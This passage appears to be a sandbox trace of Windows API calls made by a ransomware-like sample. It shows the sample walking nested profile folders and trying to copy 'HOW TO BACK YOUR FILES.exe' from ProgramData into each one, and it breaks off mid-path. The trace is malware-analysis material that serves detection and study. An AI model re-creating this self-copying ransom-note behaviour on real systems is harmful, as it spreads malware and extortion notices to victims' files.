hTemplateFile=0x0) returned 0x154 [0065.858] GetLastError () returned 0x0 [0065.859] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.859] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.859] CloseHandle (hObject=0x154) returned 1 [0065.859] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.859] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.859] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.859] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.859] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.859] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.859] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.859] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.860] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.860] GetLastError () returned 0x0 [0065.860] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.860] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.860] CloseHandle (hObject=0x154) returned 1 [0065.860] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.860] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558e6620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558e6620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.860] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.860] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.861] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.861] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0065.861] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.861] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.861] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.861] GetLastError () returned 0x0 [0065.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.861] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.862] CloseHandle (hObject=0x154) returned 1 [0065.862] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.862] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559328e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559328e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.862] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.862] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.862] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.862] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0065.862] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.862] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.863] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.863] GetLastError () returned 0x0 [0065.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.863] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.863] CloseHandle (hObject=0x154) returned 1 [0065.863] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.863] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55958a40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55958a40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.863] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.863] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.863] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0065.864] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft" [0065.864] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.864] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.864] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.864] GetLastError () returned 0x0 [0065.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.864] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.864] CloseHandle (hObject=0x154) returned 1 [0065.865] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.865] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.865] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.865] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.865] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.865] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar" [0065.865] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.865] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.866] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.866] GetLastError () returned 0x0 [0065.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.866] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.866] CloseHandle (hObject=0x154) returned 1 [0065.866] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.866] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559a4d00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559a4d00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.866] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.866] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.866] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.867] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets" [0065.867] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.867] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows sidebar\\gadgets\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.867] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.867] GetLastError () returned 0x0 [0065.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.867] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.867] CloseHandle (hObject=0x154) returned 1 [0065.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.868] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.868] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.868] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.868] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.868] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.868] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.868] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.869] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.869] GetLastError () returned 0x0 [0065.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.869] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.869] CloseHandle (hObject=0x154) returned 1 [0065.869] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.869] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.869] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.869] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.869] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.869] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.869] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.870] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.870] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.870] GetLastError () returned 0x0 [0065.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.870] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.870] CloseHandle (hObject=0x154) returned 1 [0065.870] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.871] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.871] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.871] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.871] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application 